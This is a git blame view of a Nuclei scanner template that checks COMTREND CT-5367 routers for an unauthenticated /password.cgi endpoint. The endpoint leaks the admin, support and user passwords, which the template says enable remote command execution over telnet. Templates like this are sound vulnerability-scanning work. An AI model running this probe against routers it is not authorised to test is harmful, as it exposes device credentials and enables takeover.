daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/other/comtrend-password-exposure....

29 lines
787 B
YAML
Raw Normal View History

misc updates
2021-08-20 11:07:22 +00:00
id: comtrend-passsword-exposure
Create comtrend-ct5367-disclosure.yaml
2021-08-19 09:17:44 +00:00
info:
name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution
author: geeknik
severity: high
Add description
2021-10-17 12:50:52 +00:00
description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint.
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
reference:
- https://www.exploit-db.com/exploits/16275
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot:
2022-08-27 04:41:18 +00:00
tags: router,exposure,iot,rce,edb
Create comtrend-ct5367-disclosure.yaml
2021-08-19 09:17:44 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/password.cgi"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "pwdAdmin ="
- "pwdSupport ="
- "pwdUser ="
condition: and